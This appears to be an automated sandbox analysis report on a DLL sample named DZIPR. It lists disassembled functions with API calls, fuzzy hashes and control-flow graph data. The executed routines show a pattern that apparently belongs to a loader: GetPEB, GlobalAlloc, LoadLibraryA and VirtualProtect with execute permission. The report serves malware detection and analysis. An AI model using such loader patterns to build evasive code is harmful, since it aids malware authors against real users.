                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          • Opcode ID: 31e052d8a7509eef600fb8aef8644ded06e794a2ce12abaca5c9f7e93033c2b4
                                          • Instruction ID: 7ee5185eb5d472771706f2df8358abf2807514ed96fb821d95b5de4a0a1191c0
                                          • Opcode Fuzzy Hash: 31e052d8a7509eef600fb8aef8644ded06e794a2ce12abaca5c9f7e93033c2b4
                                          • Instruction Fuzzy Hash: 76F0FC32204214AFEF103B95CC8DB45777AEBD2329F164427E15483D11DB31A440C5A5
                                          Function 6C51BA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5432EC), ref: 6C51BA69
                                          • TlsGetValue.KERNEL32(6C5432D0,?,?,?,?,6C51C0B7,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BA7D
                                          • RtlLeaveCriticalSection.NTDLL(6C5432EC), ref: 6C51BA93
                                          • RtlLeaveCriticalSection.NTDLL(6C5432EC), ref: 6C51BA9E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          • Opcode ID: d6138a0b24dbd2c6d8f60605162baf82bb72d0d516cd3bffc4be384977421d5f
                                          • Instruction ID: 17c88009fd7e4e92b93689b53245ebaf25ce644ac4e9f89dbdb7527365739885
                                          • Opcode Fuzzy Hash: d6138a0b24dbd2c6d8f60605162baf82bb72d0d516cd3bffc4be384977421d5f
                                          • Instruction Fuzzy Hash: A9F030B63082049FE7209F58CC8CC0AB7F9EB853647164417E659D3B01D670F8459BE1
                                          Function 6C53057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6C530586
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C53059D
                                          • __amsg_exit.LIBCMT ref: 6C5305AB
                                          • __lock.LIBCMT ref: 6C5305BB
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          • Opcode ID: 95585af6974866ee07febddb8db78ec6dcf120c1e517cde0550ad5f68f1feb2d
                                          • Instruction ID: b88e88ae5dffd2d374626d6d8c088ce4875ffb3ae0285bff1ab8661db7b8f5a4
                                          • Opcode Fuzzy Hash: 95585af6974866ee07febddb8db78ec6dcf120c1e517cde0550ad5f68f1feb2d
                                          • Instruction Fuzzy Hash: 1EF06D32A01724CBDB21EBA88C0578D73E06BC1728F51654AA448A7FD1EB78AD45CB61
                                          Function 6C52020C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 6C52029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C5202C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 1827994538-3772416878
                                          • Opcode ID: a8320f142d4aa09658ff7554383fa43858b4e00f73462996f593a5233f3b56c0
                                          • Instruction ID: 06134905bfca431a880bd74207bfc5e5a6cdd3fae03588385e13934768be087d
                                          • Opcode Fuzzy Hash: a8320f142d4aa09658ff7554383fa43858b4e00f73462996f593a5233f3b56c0
                                          • Instruction Fuzzy Hash: 5931DD312023509FDB119FA5CC98AAABBF5BF89318F15022BE15697FD1DB34E804CB54
                                          Function 6C51A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6C51A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C51A6B6), ref: 6C51A5AA
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C51A5CB
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C51A5DD
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C51A5EF
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C51A601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C51A6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6C51A6E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          • Opcode ID: bb6d1cb00a10adb823c8bbc63da337a812a6eb0d853d199caf584970f629d034
                                          • Instruction ID: ae31034064e847856df1e82d617b285755520f02803fe6023fcf48c369fd24dd
                                          • Opcode Fuzzy Hash: bb6d1cb00a10adb823c8bbc63da337a812a6eb0d853d199caf584970f629d034
                                          • Instruction Fuzzy Hash: 98217C709042189EEB21DF71CC5C7DEB7B8BF44328F10869AD069D6680DB749B89CF54
                                          Function 6C518E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C518E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6C518E8E
                                            • Part of subcall function 6C518BDF: __EH_prolog3_GS.LIBCMT ref: 6C518BE9
                                            • Part of subcall function 6C518BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C518EB7,?,?), ref: 6C518C19
                                            • Part of subcall function 6C518BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C518C2D
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518C69
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518C77
                                            • Part of subcall function 6C518BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C518C94
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518CBF
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C518CC8
                                            • Part of subcall function 6C518BDF: GetModuleFileNameW.KERNEL32(6C510000,?,00000105), ref: 6C518D7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          • Opcode ID: 54aedcac2c5029526205a3e4b4c43a325f655030c615cd941a23514305f790f3
                                          • Instruction ID: 69fd0afa7b08136939086fa73a4c7f3ff18c132296b2fa165ba1cdec73178c4f
                                          • Opcode Fuzzy Hash: 54aedcac2c5029526205a3e4b4c43a325f655030c615cd941a23514305f790f3
                                          • Instruction Fuzzy Hash: AD01A771605118EBDB15DB68DC899EB73F9BF49304F060566A405EB540E670DA088B55
                                          Function 6C52C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6C525017: __getptd.LIBCMT ref: 6C52501D
                                            • Part of subcall function 6C525017: __getptd.LIBCMT ref: 6C52502D
                                          • __getptd.LIBCMT ref: 6C52C54B
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C559
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                          • Instruction ID: 41c104ce9f099ccdac1e8401ef1f5122f96f60529ff4ff0e91b99a7f6e6c6c8c
                                          • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                          • Instruction Fuzzy Hash: 11018B70905201CBEF24AF61CC4069EBBF5AF10218FA4452ED44096ED3CB38EA84CF41
                                          Function 6C520DE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3
                                          • String ID: PTl$xPTl
                                          • API String ID: 431132790-4124573034
                                          • Opcode ID: 8b51c5a463ab5188985f87478f3901d8e43950760cb5e40d6e4cdb21b017d359
                                          • Instruction ID: 38a0b6edfb1da3676828dc8167d19aea516148a5c7542fb1477936edb3ea64a8
                                          • Opcode Fuzzy Hash: 8b51c5a463ab5188985f87478f3901d8e43950760cb5e40d6e4cdb21b017d359
                                          • Instruction Fuzzy Hash: B8F08672D03361CFDB609B648DA53A9B3E06F8431AF61464E90B957ED0C77C9C84C682
                                          Function 6C5172FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 6C517318
                                          • PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6C517540,00000000,?), ref: 6C51732D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: PathRootStrip_memset
                                          • String ID: @uQl
                                          • API String ID: 2213896960-265186556
                                          • Opcode ID: 99889bcc25a62f8e6ffab41dbbe22f39b04efef9761b606d7ebc369af3298153
                                          • Instruction ID: 32b58e9561db73ee9ef644bc08bab3162cf48cada7f624a30fd8173adfbff23e
                                          • Opcode Fuzzy Hash: 99889bcc25a62f8e6ffab41dbbe22f39b04efef9761b606d7ebc369af3298153
                                          • Instruction Fuzzy Hash: A9E09236144014B7D60066998C48EEF3B6D9FD6674F104215F92856BC19F649D0586B6

                                          Executed Functions

                                          Function 6FAC63F0 Relevance: 4.7, APIs: 3, Instructions: 239memorylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 25 6fac63f0-6fac63f8 26 6fac649c-6fac64c1 25->26 27 6fac63fe-6fac640f 25->27 29 6fac6524 26->29 30 6fac64c3 26->30 28 6fac6413-6fac641e 27->28 31 6fac6420 28->31 32 6fac6481 28->32 33 6fac6526-6fac6551 29->33 34 6fac64c5-6fac64cb 30->34 36 6fac6422-6fac6427 31->36 39 6fac6483-6fac6487 32->39 37 6fac6557-6fac6568 33->37 38 6fac65f1 33->38 34->34 35 6fac64cd-6fac64cf 34->35 35->29 40 6fac64d1-6fac64d7 35->40 36->36 42 6fac6429-6fac642b 36->42 43 6fac656c-6fac6577 37->43 41 6fac65f3-6fac6661 LoadLibraryA VirtualProtect call 6fac67f8 VirtualProtect 38->41 44 6fac648d-6fac6492 39->44 45 6fac671b-6fac671e 39->45 46 6fac64dd-6fac64e6 40->46 47 6fac66f0 40->47 60 6fac6682-6fac66a9 41->60 61 6fac6663 41->61 42->32 49 6fac642d-6fac6433 42->49 50 6fac6579 43->50 51 6fac65da 43->51 44->28 52 6fac6498 44->52 54 6fac64ea-6fac6501 46->54 56 6fac6439-6fac6443 49->56 57 6fac66e6 49->57 58 6fac657b-6fac6580 50->58 53 6fac65dc-6fac65e0 51->53 52->26 64 6fac6704-6fac6716 53->64 65 6fac65e6-6fac65eb 53->65 54->54 59 6fac6503-6fac6513 54->59 62 6fac6447-6fac645e 56->62 70 6fac66fa 57->70 58->58 63 6fac6582-6fac6584 58->63 59->33 66 6fac6515-6fac6522 59->66 67 6fac6667-6fac6680 61->67 62->62 68 6fac6460-6fac6471 62->68 63->51 69 6fac6586-6fac658c 63->69 64->41 65->38 65->43 66->33 67->60 67->67 68->39 72 6fac6473-6fac647f 68->72 69->70 73 6fac6592-6fac659c 69->73 70->64 72->39 74 6fac65a0-6fac65b7 73->74 74->74 75 6fac65b9-6fac65ca 74->75 75->53 76 6fac65cc-6fac65d8 75->76 76->53
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FAC6602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FAC663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FAC6654
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0
                                          • Opcode ID: b09cc5cde8328a42cc5404045d1689487d0a27cbdc916b0c0537508fde53df33
                                          • Instruction ID: 3f6ac7923f4ac8dcd691a6aaf1855aebeeb9d6e7e81982eef50f8f1ded5da9aa
                                          • Opcode Fuzzy Hash: b09cc5cde8328a42cc5404045d1689487d0a27cbdc916b0c0537508fde53df33
                                          • Instruction Fuzzy Hash: A6A1CC705087558FC315CF29C58063AFBE6BF8A304F19896EE89997346D734E992CB82
                                          Function 6FAC5CA0 Relevance: 3.4, APIs: 2, Instructions: 353COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 105 6fac5ca0-6fac5d95 call 6facaf9c * 2 call 6facafc3 * 2 call 6fac64e0 GetPEB 116 6fac5de4 105->116 117 6fac5d97 105->117 119 6fac5de6-6fac5e1d 116->119 118 6fac5d99-6fac5da3 117->118 120 6fac5da5-6fac5dab 118->120 121 6fac5dd6-6fac5dd8 118->121 122 6fac5eba-6fac5f0c GlobalAlloc 119->122 123 6fac5e23-6fac5e3c 119->123 124 6fac5dae-6fac5db5 120->124 127 6fac5dde-6fac5de2 121->127 128 6fac67e1-6fac67e4 121->128 125 6fac5fad 122->125 126 6fac5f12-6fac5f2b 122->126 129 6fac5e40-6fac5e4e 123->129 131 6fac5db7-6fac5dbd 124->131 132 6fac5dc1-6fac5dcd 124->132 130 6fac5faf-6fac5fce 125->130 133 6fac5f2f-6fac5f3d 126->133 127->116 127->118 128->119 134 6fac5e50 129->134 135 6fac5ea3 129->135 145 6fac5fe7-6fac5fea 130->145 146 6fac5fd0 130->146 131->132 137 6fac5dbf 131->137 132->124 140 6fac5dcf-6fac5dd3 132->140 138 6fac5f3f 133->138 139 6fac5f92 133->139 141 6fac5e52-6fac5e58 134->141 142 6fac5ea5-6fac5ea9 135->142 137->132 147 6fac5f41-6fac5f47 138->147 149 6fac5f94-6fac5f98 139->149 140->121 141->141 148 6fac5e5a-6fac5e5c 141->148 143 6fac5eaf-6fac5eb4 142->143 144 6fac67c3-6fac67d8 142->144 143->129 150 6fac5eb6 143->150 152 6fac5fec 145->152 153 6fac5ffe-6fac6038 145->153 151 6fac5fd2-6fac5fe5 146->151 147->147 154 6fac5f49-6fac5f4b 147->154 148->135 155 6fac5e5e-6fac5e64 148->155 157 6fac5f9e-6fac5fa3 149->157 158 6fac67a5-6fac67be 149->158 150->122 151->145 151->151 160 6fac5fee-6fac5ffc 152->160 161 6fac603e-6fac6057 153->161 162 6fac60d9 153->162 154->139 163 6fac5f4d-6fac5f53 154->163 164 6fac66aa-6fac66af 155->164 165 6fac5e6a-6fac5e6e 155->165 157->133 159 6fac5fa5-6fac5fa9 157->159 158->130 159->125 160->153 160->160 168 6fac605b-6fac6069 161->168 166 6fac60db-6fac60ef 162->166 169 6fac5f59-6fac5f5d 163->169 170 6fac66b4 163->170 167 6fac5e90-6fac5e95 164->167 171 6fac5e70-6fac5e86 165->171 167->142 176 6fac5e97-6fac5ea1 167->176 172 6fac60be 168->172 173 6fac606b 168->173 174 6fac5f5f-6fac5f75 169->174 178 6fac66be 170->178 171->171 175 6fac5e88-6fac5e8c 171->175 177 6fac60c0-6fac60c4 172->177 179 6fac606d-6fac6073 173->179 174->174 180 6fac5f77-6fac5f84 174->180 175->167 176->142 181 6fac6788-6fac67a0 177->181 182 6fac60ca-6fac60cf 177->182 178->181 179->179 183 6fac6075-6fac6077 179->183 180->149 184 6fac5f86-6fac5f90 180->184 181->166 182->168 185 6fac60d1-6fac60d5 182->185 183->172 186 6fac6079-6fac607f 183->186 184->149 185->162 186->178 187 6fac6085-6fac6089 186->187 188 6fac608b-6fac60a1 187->188 188->188 189 6fac60a3-6fac60b0 188->189 189->177 190 6fac60b2-6fac60bc 189->190 190->177
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0
                                          • Opcode ID: 47c2a343661350776a1e81f289fd57e906b98bb1598637f56ec79aceaabc69d6
                                          • Instruction ID: 855e11e7b0a8b5285e3d7e07db5ee6a55eeed65d10af93b086620e069806db1a
                                          • Opcode Fuzzy Hash: 47c2a343661350776a1e81f289fd57e906b98bb1598637f56ec79aceaabc69d6
                                          • Instruction Fuzzy Hash: 78E16BB09087058FC718CF1AC49062AFBE1FF89314F55892EE89A97351D734F895CB92
                                          Function 6FAC5E70 Relevance: 1.5, APIs: 1, Instructions: 248memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 351 6fac5e70-6fac5e86 351->351 352 6fac5e88-6fac5e8c 351->352 353 6fac5e90-6fac5e95 352->353 354 6fac5ea5-6fac5ea9 353->354 355 6fac5e97-6fac5ea1 353->355 356 6fac5eaf-6fac5eb4 354->356 357 6fac67c3-6fac67d8 354->357 355->354 358 6fac5eb6-6fac5f0c GlobalAlloc 356->358 359 6fac5e40-6fac5e4e 356->359 364 6fac5fad 358->364 365 6fac5f12-6fac5f2b 358->365 362 6fac5e50 359->362 363 6fac5ea3 359->363 366 6fac5e52-6fac5e58 362->366 363->354 367 6fac5faf-6fac5fce 364->367 368 6fac5f2f-6fac5f3d 365->368 366->366 369 6fac5e5a-6fac5e5c 366->369 374 6fac5fe7-6fac5fea 367->374 375 6fac5fd0 367->375 371 6fac5f3f 368->371 372 6fac5f92 368->372 369->363 373 6fac5e5e-6fac5e64 369->373 376 6fac5f41-6fac5f47 371->376 379 6fac5f94-6fac5f98 372->379 377 6fac66aa-6fac66af 373->377 378 6fac5e6a-6fac5e6e 373->378 381 6fac5fec 374->381 382 6fac5ffe-6fac6038 374->382 380 6fac5fd2-6fac5fe5 375->380 376->376 383 6fac5f49-6fac5f4b 376->383 377->353 378->351 384 6fac5f9e-6fac5fa3 379->384 385 6fac67a5-6fac67be 379->385 380->374 380->380 387 6fac5fee-6fac5ffc 381->387 388 6fac603e-6fac6057 382->388 389 6fac60d9 382->389 383->372 390 6fac5f4d-6fac5f53 383->390 384->368 386 6fac5fa5-6fac5fa9 384->386 385->367 386->364 387->382 387->387 392 6fac605b-6fac6069 388->392 391 6fac60db-6fac60ef 389->391 393 6fac5f59-6fac5f5d 390->393 394 6fac66b4 390->394 395 6fac60be 392->395 396 6fac606b 392->396 397 6fac5f5f-6fac5f75 393->397 399 6fac66be 394->399 398 6fac60c0-6fac60c4 395->398 400 6fac606d-6fac6073 396->400 397->397 401 6fac5f77-6fac5f84 397->401 402 6fac6788-6fac67a0 398->402 403 6fac60ca-6fac60cf 398->403 399->402 400->400 404 6fac6075-6fac6077 400->404 401->379 405 6fac5f86-6fac5f90 401->405 402->391 403->392 406 6fac60d1-6fac60d5 403->406 404->395 407 6fac6079-6fac607f 404->407 405->379 406->389 407->399 408 6fac6085-6fac6089 407->408 409 6fac608b-6fac60a1 408->409 409->409 410 6fac60a3-6fac60b0 409->410 410->398 411 6fac60b2-6fac60bc 410->411 411->398
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FAC5ECA
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 5619a3eb60206dbba85a8ccaba38dc6d104fb31c5a60a225cf418c108d438a68
                                          • Instruction ID: 48d0b7becb0ce3cad61d328b5d7511903bedd43bb5b5344c87777f8ad6449d19
                                          • Opcode Fuzzy Hash: 5619a3eb60206dbba85a8ccaba38dc6d104fb31c5a60a225cf418c108d438a68
                                          • Instruction Fuzzy Hash: C2A17E706087068FC708CF2DC59063AB7E2BF89304F18856EE89697356D774F996CB92
                                          Function 6FACBC4E Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF32EC), ref: 6FACBC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FAF32D0,6FAF32D0,?,6FACC0A4,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBCB7
                                          • GlobalHandle.KERNEL32(00CCC838), ref: 6FACBCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FACBCCA
                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FACBCE3
                                          • GlobalHandle.KERNEL32(00CCC838), ref: 6FACBCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6FACBCFC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBD05
